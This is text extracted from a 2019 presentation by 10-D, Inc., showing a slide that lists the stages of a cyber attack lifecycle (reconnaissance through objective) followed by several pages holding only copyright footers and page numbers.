©2019 10-D, Inc. All Rights Reserved 23

Cyber Attack Lifecycle

Reconnaissance Weaponization Delivery Initial Install & Expand Access Objective

24 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 24

25 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 25

26 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 26

27 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 27

28 ©2019 10-D, Inc. All Rights Reserved.

©2019 10-D, Inc. All Rights Reserved 28